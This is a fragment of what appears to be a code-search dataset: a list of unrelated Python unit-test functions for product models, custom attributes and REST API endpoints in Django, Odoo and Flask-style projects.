demo_product.state2 = 'draft'\n self.assertEqual(demo_product.state2, 'draft')\n\n # Update new product invividual field (field defined in product.product\n # model).\n self.assertEqual(new_product.default_code, 'A2330')\n new_product.default_code = 'A2330-1'\n self.assertEqual(new_product.default_code, 'A2330-1')\n\n # Same but to an existing demo product.\n self.assertEqual(demo_product.default_code, 'A2329')\n demo_product.default_code = 'A2329-1'\n self.assertEqual(demo_product.default_code, 'A2329-1')\n\n # Update new product commom characteristic 
(field defined in\n # product.template) and check that affects the another product\n # variants\n self.assertFalse(new_product.description)\n new_product.description = 'This is a New Product'\n self.assertEqual(new_product.description, 'This is a New Product')\n self.assertEqual(demo_product.description, 'This is a New Product')\n demo_product.description = False\n self.assertFalse(demo_product.description)", "def test_product_detail(self):\n # first performing create\n id = self._create_model(\"product\", self.product_data, [\"name\", \"description\", \"image_link\", \"price\"])\n if id:\n # then performing detail\n self._detail_model(\"product\", self.product_data, id, [\"name\", \"description\", \"image_link\", \"price\"])\n \n self.assertIsNotNone(id)", "def test_custom_attribute_post_both(self):\n gen = self.generator.generate_custom_attribute\n _, cad = gen(\"product\", attribute_type=\"Text\", title=\"normal text\")\n cad_json = builder.json.publish(cad.__class__.query.get(cad.id))\n cad_json = builder.json.publish_representation(cad_json)\n pid = models.Person.query.first().id\n\n product_data = [\n {\n \"product\": {\n \"kind\": None,\n \"owners\": [],\n \"custom_attribute_definitions\":[\n cad_json,\n ],\n \"custom_attribute_values\": [{\n \"attribute_value\": \"new value\",\n \"custom_attribute_id\": cad.id,\n }],\n \"custom_attributes\": {\n cad.id: \"old value\",\n },\n \"contact\": {\n \"id\": pid,\n \"href\": \"/api/people/{}\".format(pid),\n \"type\": \"Person\"\n },\n \"title\": \"simple product\",\n \"description\": \"\",\n \"secondary_contact\": None,\n \"notes\": \"\",\n \"url\": \"\",\n \"reference_url\": \"\",\n \"slug\": \"\",\n \"context\": None\n }\n }\n ]\n\n response = self._post(product_data)\n ca_json = response.json[0][1][\"product\"][\"custom_attribute_values\"][0]\n self.assertEqual(ca_json[\"attribute_value\"], \"new value\")\n\n product = models.Product.eager_query().first()\n self.assertEqual(len(product.custom_attribute_values), 1)\n self.assertEqual(\n product.custom_attribute_values[0].attribute_value,\n \"new value\"\n )", "def test_defaults(self):\n p = Product.objects.create(\n name=\"Product\", slug=\"product\", sku=\"4711\", price=42.0)\n\n self.assertEqual(p.name, \"Product\")\n self.assertEqual(p.slug, \"product\")\n self.assertEqual(p.sku, \"4711\")\n self.assertEqual(p.price, 42.0)\n self.assertEqual(p.effective_price, 42.0)\n self.assertEqual(p.short_description, \"\")\n self.assertEqual(p.description, \"\")\n self.assertEqual(len(p.images.all()), 0)\n\n self.assertEqual(p.meta_title, \"<name>\")\n self.assertEqual(p.meta_description, \"\")\n self.assertEqual(p.meta_keywords, \"\")\n\n self.assertEqual(len(p.related_products.all()), 0)\n self.assertEqual(len(p.accessories.all()), 0)\n\n self.assertEqual(p.for_sale, False)\n self.assertEqual(p.for_sale_price, 0.0)\n self.assertEqual(p.active, False)\n\n self.assertEqual(p.deliverable, True)\n self.assertEqual(p.manual_delivery_time, False)\n self.assertEqual(p.delivery_time, None)\n self.assertEqual(p.order_time, None)\n self.assertEqual(p.ordered_at, None)\n self.assertEqual(p.manage_stock_amount, False)\n self.assertEqual(p.stock_amount, 0)\n\n self.assertEqual(p.weight, 0)\n self.assertEqual(p.height, 0)\n self.assertEqual(p.length, 0)\n self.assertEqual(p.width, 0)\n\n self.assertEqual(p.tax, None)\n self.assertEqual(p.sub_type, STANDARD_PRODUCT)\n\n self.assertEqual(p.default_variant, None)\n self.assertEqual(p.variants_display_type, LIST)\n\n self.assertEqual(p.parent, None)\n 
self.assertEqual(p.active_name, False)\n self.assertEqual(p.active_sku, False)\n self.assertEqual(p.active_short_description, False)\n self.assertEqual(p.active_description, False)\n self.assertEqual(p.active_price, False)\n self.assertEqual(p.active_images, False)\n self.assertEqual(p.active_related_products, False)\n self.assertEqual(p.active_accessories, False)\n self.assertEqual(p.active_meta_description, False)\n self.assertEqual(p.active_meta_keywords, False)", "def new_object_data(self):\n self.product_fixture = self.F.ProductFactory.create()\n modifiers = (self.datetime, self.resource_name)\n fields = {\n u\"name\": unicode(\"test_%s_%s\" % modifiers),\n u\"description\": unicode(\"test %s %s\" % modifiers),\n u\"product\": unicode(self.get_detail_url(\n \"product\", self.product_fixture.id)),\n u\"status\": unicode(\"draft\"),\n u\"created_by\": None,\n u\"modified_by\": None,\n u\"modified_on\": self.utcnow.strftime(\"%Y-%m-%d %H:%M:%S\"),\n }\n return fields", "def setUp(self):\n # Request the Product Id by posting it\n response = self.client.post('/api/productsdata/',\n data=json.dumps(self.product_payload),\n content_type=self.content_type)\n\n # Checking the response\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response.json().get('name'), 'Olive Oil')\n\n # Storing ID for further test cases checking\n type(self).product_id = response.json().get('id')", "def test_data_object_vaporise(self):\n pass", "def test_custom_attribute_get(self):\n gen = self.generator.generate_custom_attribute\n _, cad = gen(\"product\", attribute_type=\"Text\", title=\"normal text\")\n pid = models.Person.query.first().id\n\n product_data = [\n {\n \"product\": {\n \"kind\": None,\n \"owners\": [],\n \"custom_attribute_values\": [{\n \"attribute_value\": \"my custom attribute value\",\n \"custom_attribute_id\": cad.id,\n }],\n \"contact\": {\n \"id\": pid,\n \"href\": \"/api/people/{}\".format(pid),\n \"type\": \"Person\"\n },\n \"title\": \"simple product\",\n \"description\": \"\",\n \"secondary_contact\": None,\n \"notes\": \"\",\n \"url\": \"\",\n \"reference_url\": \"\",\n \"slug\": \"\",\n \"context\": None\n }\n }\n ]\n\n response = self._post(product_data)\n product_url = response.json[0][1][\"product\"][\"selfLink\"]\n get_response = self.client.get(product_url)\n product = get_response.json[\"product\"]\n self.assertIn(\"custom_attribute_values\", product)\n self.assertEqual(len(product[\"custom_attribute_values\"]), 1)\n cav = product[\"custom_attribute_values\"][0]\n self.assertIn(\"custom_attribute_id\", cav)\n self.assertIn(\"attribute_value\", cav)\n self.assertIn(\"id\", cav)", "def test_create(self):\n self.assertEqual(Product.objects.count(), 2)\n payload = {\n 'name': 'New product',\n 'category': self.category_1.id,\n 'sku': '11111111',\n 'description': 'New product description',\n 'price': 39.99\n }\n\n headers = {\n 'HTTP_AUTHORIZATION': 'Token ' + str(self.token_admin)\n }\n response = self.client.post(\n '/api/products/', data=payload, content_type='application/json', **headers)\n self.assertEqual(response.status_code, 201)\n self.assertEqual(response['Content-Type'], 'application/json')\n self.assertEqual(Product.objects.count(), 3)\n\n product = Product.objects.get(name='New product')\n self.assertEqual(product.name, 'New product')\n self.assertEqual(product.category, self.category_1)\n self.assertEqual(product.sku, '11111111')\n self.assertEqual(product.description, 'New product description')\n self.assertEqual(float(product.price), 39.99)", "def 
test_01_product_create(self):\n # Create new product with a replacement product\n product = self.create_product()\n\n # Check recently was created product with default 'In Development'\n # value state and that the replacement was assigned. This case also\n # check the read test.\n self.assertTrue(product)\n self.assertEqual(product.state2, 'draft')\n self.assertTrue(product.replacement_product_ids)\n self.assertEqual(len(product.replacement_product_ids), 1)\n self.assertEqual(product.replacement_product_ids[0].id,\n self.ref('product_lifecycle.product_product_4e'))", "def test_model_saves_value_to_database( self ):\r\n\t\tretrieved_object = TestModel.objects.get( id = self.m_test_model.id )\r\n\t\tself.assertEqual( retrieved_object.custom_field, custom_data )", "def test_product_labels(self):\n\n prd = Product.objects.get(id=1)\n # label name\n label_name = prd._meta.get_field('name').verbose_name\n self.assertEqual(label_name, 'name')\n # label description\n label_name = prd._meta.get_field('description').verbose_name\n self.assertEqual(label_name, 'description')\n # label nutrition_grade\n label_name = prd._meta.get_field('nutrition_grade').name\n self.assertEqual(label_name, 'nutrition_grade')\n # label barcode\n label_name = prd._meta.get_field('barcode').verbose_name\n self.assertEqual(label_name, 'barcode')\n # label url\n label_name = prd._meta.get_field('url').verbose_name\n self.assertEqual(label_name, 'url')\n # label url_pic\n label_name = prd._meta.get_field('url_pic').name\n self.assertEqual(label_name, 'url_pic')\n # label store\n label_name = prd._meta.get_field('store').verbose_name\n self.assertEqual(label_name, 'store')\n # label prd_cat\n label_name = prd._meta.get_field('prd_cat').name\n self.assertEqual(label_name, 'prd_cat')\n # label fat\n label_name = prd._meta.get_field('fat').verbose_name\n self.assertEqual(label_name, 'fat')\n # label saturated_fat\n label_name = prd._meta.get_field('saturated_fat').name\n self.assertEqual(label_name, 'saturated_fat')\n # label sugar\n label_name = prd._meta.get_field('sugar').verbose_name\n self.assertEqual(label_name, 'sugar')\n # label salt\n label_name = prd._meta.get_field('salt').verbose_name\n self.assertEqual(label_name, 'salt')", "def test_product_nullables(self):\n self.assertIsNone(self.product3.main_image)\n self.assertIsNone(self.product3.protein)\n self.assertIsNone(self.product3.fat)\n self.assertIsNone(self.product3.carbs)\n self.assertIsNone(self.product3.calories)", "def test_fieldValueTypes(self):\n # tests for \"method\" and \"datetime\" values follow later on ...\n # booleans are not tested yet\n\n factory = self.root.manage_addProduct['Formulator']\n factory.manage_add('form', 'ValueTest')\n factory.manage_add('form2', 'ValueTest')\n form = self.root.form\n form.manage_addField('int_field', 'Test Integer Field', 'IntegerField')\n form.manage_addField('float_field', 'Test Float Field', 'FloatField')\n form.manage_addField('date_field', 'Test Date Field', 'DateTimeField')\n form.manage_addField('list_field', 'Test List Field', 'ListField')\n form.manage_addField(\n 'multi_field',\n 'Test Checkbox Field',\n 'MultiCheckBoxField')\n form.manage_addField('link_field', 'Test Link Field', 'LinkField')\n form.manage_addField('empty_field', 'Test Empty Field', 'StringField')\n int_field = form.int_field\n float_field = form.float_field\n date_field = form.date_field\n list_field = form.list_field\n multi_field = form.multi_field\n link_field = form.link_field\n empty_field = form.empty_field\n\n # XXX editing fields 
by messing with a fake request\n # -- any better way to do this?\n # (could assign to \"values\" directly ...)\n\n default_values = {'field_title': 'Test Title',\n 'field_display_width': '92',\n 'field_required': 'checked',\n 'field_enabled': 'checked',\n }\n try:\n form_values = default_values.copy()\n form_values.update({'field_default': 'None',\n 'field_required': '',\n })\n empty_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n form_values = default_values.copy()\n form_values.update({'field_default': '42',\n 'field_enabled': 'checked'})\n int_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n form_values = default_values.copy()\n form_values.update({'field_default': '1.7'})\n float_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n # XXX cannot test \"defaults to now\", as this may fail randomly\n form_values = default_values.copy()\n form_values.update({'field_input_style': 'list',\n 'field_input_order': 'mdy',\n 'field_date_only': '',\n 'field_css_class': 'test_css',\n 'field_time_separator': '$'})\n date_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n form_values = default_values.copy()\n form_values.update({'field_default': 'foo',\n 'field_size': '1',\n 'field_items': 'Foo | foo\\n Bar | bar'})\n list_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n form_values = default_values.copy()\n form_values.update(\n {'field_default': 'foo',\n 'field_size': '3',\n 'field_items': 'Foo | foo\\n Bar | bar\\nBaz | baz',\n 'field_orientation': 'horizontal',\n 'field_view_separator': '<br />\\n'})\n multi_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n form_values = default_values.copy()\n form_values.update({'field_default': 'http://www.absurd.org',\n 'field_required': '1',\n 'field_check_timeout': '5.0',\n 'field_link_type': 'external',\n })\n link_field.manage_edit(REQUEST=TestRequest(form=form_values))\n\n except ValidationError as e:\n self.fail('error when editing field %s; error message: %s' %\n (e.field_id, e.error_text))\n\n form2 = self.root.form2\n\n xml = formToXML(form)\n XMLToForm(xml, form2)\n\n self.assertEqualForms(form, form2)\n\n request = TestRequest()\n request.form['field_int_field'] = '42'\n request.form['field_float_field'] = '2.71828'\n request.form['subfield_date_field_month'] = '11'\n request.form['subfield_date_field_day'] = '11'\n # This field only allows ten years in the future, today 2023-03-14\n request.form['subfield_date_field_year'] = '2033'\n request.form['subfield_date_field_hour'] = '09'\n request.form['subfield_date_field_minute'] = '59'\n request.form['field_list_field'] = 'bar'\n request.form['field_multi_field'] = ['bar', 'baz']\n request.form['field_link_field'] = 'http://www.zope.org'\n try:\n result1 = form.validate_all(request)\n except FormValidationError as e:\n # XXX only render first error ...\n self.fail('error when editing form1, field %s; error message: %s' %\n (e.errors[0].field_id, e.errors[0].error_text))\n\n try:\n result2 = form2.validate_all(request)\n except FormValidationError as e:\n # XXX only render first error ...\n self.fail('error when editing form1, field %s; error message: %s' %\n (e.errors[0].field_id, e.errors[0].error_text))\n self.assertEqual(result1, result2)\n self.assertEqual(42, result2['int_field'])\n self.assertEqual(2.71828, result2['float_field'])\n\n # check link field timeout value\n self.assertEqual(link_field.get_value('check_timeout'),\n form2.link_field.get_value('check_timeout'))\n\n # XXX not tested: equal form validation failure on 
invalid input", "def test_add_new_product(self):\n response=self.add_new_product()\n result = json.loads(response.data.decode('utf-8'))\n self.assertEqual(response.status_code, 201, result['New Product'])", "def test_get_attribute_data(self):\n pass", "def test_custom_attribute_post_old(self):\n gen = self.generator.generate_custom_attribute\n _, cad = gen(\"product\", attribute_type=\"Text\", title=\"normal text\")\n cad_json = builder.json.publish(cad.__class__.query.get(cad.id))\n cad_json = builder.json.publish_representation(cad_json)\n pid = models.Person.query.first().id\n\n product_data = [\n {\n \"product\": {\n \"kind\": None,\n \"owners\": [],\n \"custom_attribute_definitions\":[\n cad_json,\n ],\n \"custom_attribute_values\": [{\n \"id\": 1,\n \"href\": \"/api/custom_attribute_values/1\",\n \"type\": \"CustomAttributeValues\"\n }],\n \"custom_attributes\": {\n cad.id: \"old value\",\n },\n \"contact\": {\n \"id\": pid,\n \"href\": \"/api/people/{}\".format(pid),\n \"type\": \"Person\"\n },\n \"title\": \"simple product\",\n \"description\": \"\",\n \"secondary_contact\": None,\n \"notes\": \"\",\n \"url\": \"\",\n \"reference_url\": \"\",\n \"slug\": \"\",\n \"context\": None\n }\n }\n ]\n\n response = self._post(product_data)\n self.assert200(response)\n ca_json = response.json[0][1][\"product\"][\"custom_attribute_values\"][0]\n self.assertEqual(ca_json[\"attribute_value\"], \"old value\")\n\n product = models.Product.eager_query().first()\n self.assertEqual(len(product.custom_attribute_values), 1)\n self.assertEqual(\n product.custom_attribute_values[0].attribute_value,\n \"old value\"\n )", "def test_create_product(self):\n url = reverse('products:list')\n data = {\n 'name': 'Banana',\n 'description': '''\n Bananas are one of the most widely consumed fruits in the\n world for good reason. 
Eating them could help lower blood\n pressure and reduce the risks of cancer and asthma.\n '''\n }\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertEqual(models.Product.objects.filter(name=data['name']).count(), 1)", "def test_default_product_price(self):\n prod = product('Test Product')\n self.assertEqual(prod.price, 10)\n self.assertEqual(prod.weight, 20)", "def setUp(self):\n super(TestProductLifecycle, self).setUp()\n self.sellable_product = self.ref('product.product_product_4c')\n self.obsolete_product = self.ref('product.product_product_4b')\n self.draft_product = self.ref('product.product_product_4')\n self.sellable_replacement = self.ref(\n 'product_lifecycle.product_product_4g')\n self.obsolete_replacement = self.ref(\n 'product_lifecycle.product_product_4f')\n self.product_obj = self.env['product.product']\n self.order_obj = self.env['purchase.order']\n self.imd_obj = self.env['ir.model.data']\n self.wiz_obj = self.env['replacement.product']", "def test_create_product_success(self):\n res = self.client.post(PRODUCTS_URL, PRODUCT_PAYLOAD)\n\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)\n self.assertEqual(res.data['supplier_id'], self.user.id)\n self.assertEqual(res.data['name'], PRODUCT_PAYLOAD['name'])\n self.assertEqual(res.data['price'], PRODUCT_PAYLOAD['price'])", "def test_create_product(self):\n obj1 = Product.objects.first()\n obj2 = Product.objects.last()\n\n expected_str1 = f\"{obj1.code} -- {obj1.name} -- \" \\\n f\"{obj1.schedule} -- {obj1.spl}\"\n self.assertEqual(str(obj1), expected_str1)\n self.assertNotEqual(str(obj2), expected_str1)", "def test_data_object_post(self):\n pass", "def test_changedata(self):\n p = model.Person(firstname=\"Tobias\", lastname=\"Thelen\",\n email=\"tthelen@uos.de\", hobbies=[\"singen\",\"springen\",\"fröhlichsein\"])\n id = p.store()\n\n p = model.Person(id=id)\n p['firstname'] = \"Walter\"\n p.store()\n\n p2 = model.Person(id=id)\n self.assertEqual(p2.firstname, \"Walter\")\n self.assertEqual(p2.lastname, \"Thelen\")", "def attribute(self, data, model, model_name):", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)\n self.assertEqual(prod.weight, 20)\n self.assertEqual(prod.flammability, 0.5)", "def test_record(self):\n self.assertEqual(self.record.attrib['id'],\n 'nhc_def_conf_adt_user',\n 'Incorrect ID ')\n self.assertEqual(self.record.attrib['model'],\n 'res.users',\n 'Incorrect model')", "def setUp(self) -> None:\n self.default = Product('Test Product')\n self.tester = Product('Tester', price=15, weight=2)", "def test_create_drug_successful(self):\n generic = models.Generic.objects.create(\n generic_name=\"Lisinopril\"\n )\n print(type(generic))\n drug = models.Drug.objects.create(\n product_id='12345',\n generic_name=generic,\n product_ndc=\"99999-9999\",\n brand_name=\"Zestril\"\n )\n\n self.assertEqual(str(drug), f\"{drug.product_id} {drug.product_ndc}\")", "def test_create_record(self):\n pass", "def test_add_product(self):\n view = ProductCreateListView.as_view({'post': 'create'})\n uri = reverse('products:create/list-products')\n data = {\n \"name\": \"Iphone 7\",\n \"description\": \"Mobile phone\",\n \"price\": 200,\n \"is_available\": True\n }\n request = self.factory.post(uri, data, HTTP_AUTHORIZATION='Token {}'.format(self.token_admin.key))\n request.user = self.user['admin']\n response = view(request)\n self.assertEqual(response.status_code, 201,\n f'Expected 
Response Code 201, received {response.status_code} instead.')", "def test_product_is_saved_on_creation(self):\n self.assertEquals(self.prod_1.image, 'product_default.png')", "def test_insert_data(self):\n self.engine.insert_data(self.correct_camper_data)\n self.assertDictEqual(\n self.ds.store,\n {\n 3: Camper(**{\n \"id\": 3,\n \"latitude\": 38.7436883,\n \"longitude\": -9.1952226,\n \"price_per_day\": 85.5,\n \"weekly_discount\": 0.25\n })\n })", "def test_attr(self):\n new_review = Review()\n self.assertTrue(hasattr(new_review, \"id\"))\n self.assertTrue(hasattr(new_review, \"created_at\"))\n self.assertTrue(hasattr(new_review, \"updated_at\"))\n self.assertTrue(hasattr(new_review, \"place_id\"))\n self.assertTrue(hasattr(new_review, \"user_id\"))\n self.assertTrue(hasattr(new_review, \"text\"))", "def test_create_basic_recipe(self):\n payload = {\"title\": \"Vietnamese Cake\",\n \"time_minutes\": 45,\n \"price\": 5.55}\n res = self.client.post(RECIPE_URL, payload)\n recipe = Recipe.objects.get(id=res.data['id'])\n for key in payload.keys():\n if key == \"price\":\n self.assertEqual(round(Decimal(payload[key]), 2), getattr(recipe, key))\n else:\n self.assertEqual(payload[key], getattr(recipe, key))\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)", "def test_cannot_make_sale_with_wrong_datatypes(self):\n reply = self.admin_add_product()\n\n resp = self.admin_create_user()\n reply = self.attendant_login()\n token = reply['token']\n sale = dict(products = [\n {\n \"prod_name\":\"NY_345\", \n \"quantity\":'Kummi'\n }\n\t ])\n resp = self.client.post(\n '/api/v1/sales',\n content_type='application/json',\n data=json.dumps(sale),\n headers={'Authorization': 'Bearer {}'.format(token)}\n )\n reply = json.loads(resp.data.decode())\n \n self.assertEqual(reply['message'], 'prod_name & quantity should be a character & number respectively!')\n self.assertEqual(resp.status_code, 400)", "def test_category_model_entry(self): # PRUEBA DE CARGAR LA INFORMACION EN LOS MODELOS A TESTEAR\n data = self.data1\n self.assertTrue(isinstance(data, Category)) # REALIZA EL TESTEO ", "def test_attr(self):\n self.assertTrue(hasattr(BaseModel, \"__str__\"))\n self.assertTrue(hasattr(BaseModel, \"save\"))\n self.assertTrue(hasattr(BaseModel, \"to_dict\"))\n self.assertTrue(\"updated_at\" in self.my_model1.__dict__)\n self.assertTrue(\"created_at\" in self.my_model1.__dict__)\n self.assertTrue(\"id\" in self.my_model1.__dict__)", "def test_add_new_product(self):\n self._require_login(self.user1)\n post_data = {\n \"category\": {\n \"name\": \"deportes\",\n \"index\": 1\n },\n \"price\": \"4500.0\",\n \"name\": \"Producto 3\",\n \"description\": \"Descripcion de producto 3\"\n }\n\n response = self.client.post('/api/1.0/products/', data=post_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n self.assertNotEqual(response.data['published_date'], '')\n self.assertEqual(response.data['name'], 'Producto 3')\n self.assertEqual(response.data['description'], 'Descripcion de producto 3')\n self.assertEqual(response.data['selling'], True)\n self.assertEqual(response.data['price'], '4500.0')\n self.assertEqual(response.data['seller']['user']['username'], self.username)\n self.assertEqual(response.data['category']['name'], 'deportes')", "def test_default_product_price(self):\r\n prod = Product('Test Product')\r\n self.assertEqual(prod.price, 10)", "def test_get_attributes(self):\n pass", "def setup(self):\n print(\"INIT DATA\")\n\n self.nutella = 
Product.objects.create(name=\"nutella\", nutriscore=\"e\")", "def test_get_item(self):\n self.assertEqual(self.expected_described_model, self.mapped_model[\"described_model_type\"])", "def test_record(self):\n self.assertEqual(self.record.attrib['id'],\n 'nhc_demo_patient_0',\n 'Incorrect ID ')\n self.assertEqual(self.record.attrib['model'],\n 'nh.clinical.patient',\n 'Incorrect model')", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_default_product_price(self):\n prod = Product('Test Product')\n self.assertEqual(prod.price, 10)", "def test_update_product(self):\n data = {\n 'pk': 1,\n 'name': 'New yogurt',\n 'description': '''\n Yogurt also spelled yoghurt, yogourt or yoghourt,\n is a food produced by bacterial fermentation of milk.\n '''\n }\n url = reverse('products:detail', kwargs={'pk': data['pk']})\n response = self.client.patch(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(models.Product.objects.filter(name=data['name']).count(), 1)", "def test_required_field_values_are_present():\n\n model_definition = {'language': {'type': 'fixed',\n 'required': True,\n 'persisted': True},\n 'source': {'type': 'list',\n 'required': False,\n 'persisted': True},\n 'resources.title': {'type': 'text',\n 'required': True,\n 'persisted': True}}\n product1 = {'language': 'english'}\n factory = ProductModelFactory(model_definition)\n factory.build('product1', product1)", "def test_update_record(self):\n pass", "def test_create_product_successful(self):\n \n ProductCategory.objects.create(name=\"test name\", description=\"new name\")\n test_key = ProductCategory.objects.values()[0]\n # print(test_key)\n payload = {\n 'name': 'Test Tag',\n 'product_category_id': test_key.get('id'),\n 'unit_price': 100,\n 'quantity': 12,\n 'description': 'Test description'\n }\n \n res = self.client.post(PRODUCT_ADD_URL, payload)\n\n # print(res.data)\n self.assertEqual(res.status_code, status.HTTP_201_CREATED)", "def test_default_prodct(self):\n prod = Product(\"default\")\n self.assertEqual(prod.price, 10)\n self.assertAlmostEqual(prod.flammability, 0.5)\n self.assertEqual(prod.weight, 20)\n self.assertEqual(prod.stealability(), \"Kinda stealable.\")", "def test_create_valid_product(self):\n product_name = \"Swift Iris\"\n size = Size.SIZE_4_5\n colour = \"Red\"\n price = 47.00\n product_type = ProductType.SHOE\n product_code = \"A\"\n department = Department.LADIES\n\n product = Product(\n name=product_name,\n size=size,\n 
colour=colour,\n price=price,\n product_type=product_type,\n product_code=product_code,\n department=department,\n )\n with self.assertRaises(ValidationError):\n product.full_clean()", "def test_get_additional_seller_inputs(self):\n pass", "def test_missing_mandatory_attributes():\n model_definition = {'source': {'type': 'list',\n 'required': True,\n 'persisted': True},\n 'resources.title': {'type': 'text',\n 'required': True,\n 'persisted': True}}\n # missing language in the model\n _ = ProductModelFactory(model_definition)", "def test_new_attribute_data(db_session):\n new_att = Attribute(\n label=\"test_label\",\n desc=\"test_desc\"\n )\n db_session.add(new_att)\n att = db_session.query(Attribute).all()\n assert att[0].label == \"test_label\"\n assert att[0].desc == \"test_desc\"", "def test_books_model_entry(self):\n data = self.data1\n self.assertTrue(isinstance(data,Books))", "def test_model_keeps_value( self ):\r\n\t\tself.assertEqual( self.m_test_model.custom_field, custom_data )", "def test_admin_create_product(self):\n resp = self.admin_register()\n reply = self.admin_login()\n token = reply['token']\n product = dict(\n prod_name='NY_denims',\n category='denims',\n stock=20,\n price=150\n )\n resp = self.client.post(\n '/api/v1/products',\n content_type='application/json',\n data=json.dumps(product),\n headers={'Authorization': 'Bearer {}'.format(token)}\n )\n reply = json.loads(resp.data.decode())\n \n self.assertEqual(reply['message'], 'Product successfully added to Inventory!')\n self.assertEqual(resp.status_code, 201)", "def test_update_product_success(self):\n product = sample_product(supplier_id=self.user, name='old-name', price='100.00')\n url = detail_url(product.id)\n new_product = {\n 'name': 'new_name',\n 'price': '1000.0',\n 'image': ''\n }\n res = self.client.put(url, new_product)\n\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data['name'], new_product['name'])", "def test_model_allows_assigning_data_after_creation( self ):\r\n\t\tanother_data = { \"another_meta\" : \"another_value\" }\r\n\t\tself.m_test_model.custom_field = another_data\r\n\t\tself.m_test_model.save();\r\n\r\n\t\t# First test that the same model has assigned value\r\n\t\tself.assertEqual( self.m_test_model.custom_field, another_data )\r\n\r\n\t\t# Now test that retrieved model from database persists the value\r\n\t\tretrieved_object = TestModel.objects.get( id = self.m_test_model.id )\r\n\t\tself.assertEqual( retrieved_object.custom_field, another_data )", "def test_generate_data_model():\n params = dict(name=\"test\", type_=str, is_required=True)\n\n data_model = DataModel(\"test\", [Attribute(**params)])\n\n assert generate_data_model(\"test\", {\"test\": \"str\"}) == data_model", "def test_process_data(self):\n pass", "def test_model_field_types(self):\n self.assertTrue(isinstance(self.UserInfo.have_siblings, str))\n self.assertTrue(isinstance(self.UserInfo.known_env_exposures, str))\n self.assertTrue(isinstance(self.UserInfo.known_genetic_mutations, str))\n self.assertTrue(isinstance(self.UserInfo.age, int))", "def test_items(self):\n self.assertEqual([(\"described_model_type\", self.expected_described_model)], list(self.mapped_model.items()))", "def test_create_same_product(self):\n url = reverse('products:list')\n data = {\n 'name': 'Eggs',\n 'description': '''\n Bird and reptile eggs consist of a protective eggshell,\n albumen (egg white), and vitellus (egg yolk),\n contained within various thin membranes.\n The most commonly consumed eggs are chicken eggs.\n 
Other poultry eggs including those of duck and quail\n also are eaten.\n '''\n }\n product_count_before = models.Product.objects.count()\n response = self.client.post(url, data, format='json')\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(models.Product.objects.count(), product_count_before)", "def test_category_model_entry(self):\n data = self.data1\n self.assertEqual(str(data), 'django')", "def test_set_fields():\n\n document = DocumentFactory.create(\n charfield=\"some chars\",\n textfield=\"some text\",\n decimalfield=0.0815,\n integerfield=42,\n )\n\n assert document.charfield == \"some chars\"\n assert document.textfield == \"some text\"\n assert document.decimalfield == 0.0815\n assert document.integerfield == 42", "def test_form_submition_and_product_creation(user_company, client, authenticated_user):\n add_product_url = reverse('add-product')\n response = client.post(add_product_url, {\n 'name': 'Test_product_name',\n 'serial_number': 'XZ001', \n 'manufacturer': 'Test company',\n 'price_net': 415.26,\n 'description': fake.paragraph(),\n 'stock': 16\n })\n assert response.status_code == 302\n product = Product.objects.get(name='Test_product_name')\n assert response.url == reverse('product-detail',kwargs={'pk': product.pk}) \n assert product.user == authenticated_user\n assert product in Product.objects.all()", "def test_default_product_weight(self):\r\n prod = Product('Test Product')\r\n self.assertEqual(prod.weight, 20)", "def test_products_ref_users_put(self):\n pass", "def test_field_extra(self):\n setting_model = Setting()\n\n test_extra = {}\n setting_model.field_extra = test_extra\n self.assertEqual(setting_model.field_extra, test_extra)\n\n test_extra = {'min_lenght': 5, 'max_length': 12}\n setting_model.field_extra = test_extra\n self.assertEqual(setting_model.field_extra, test_extra)", "def test_set_data_attributes(self):\n\n self.mediator.get_results()", "def test_cannot_make_sale_with_missing_fields(self):\n reply = self.admin_add_product()\n\n resp = self.admin_create_user()\n reply = self.attendant_login()\n token = reply['token']\n sale = dict(products = [\n {\n \"prod_name\":\"\", \n \"quantity\":10\n }\n\t ])\n resp = self.client.post(\n '/api/v1/sales',\n content_type='application/json',\n data=json.dumps(sale),\n headers={'Authorization': 'Bearer {}'.format(token)}\n )\n reply = json.loads(resp.data.decode())\n \n self.assertEqual(reply['message'], 'One of the fields is empty!')\n self.assertEqual(resp.status_code, 400)", "def test_create_company_props_using_post(self):\n pass", "def test_product_delete(self):\n # first performe create\n id = self._create_model(\"product\", self.product_data, [\"name\", \"description\", \"image_link\", \"price\"])\n if id:\n # then performe delete\n self._delete_model(\"product\", id)\n self.assertIsNotNone(id)" ]
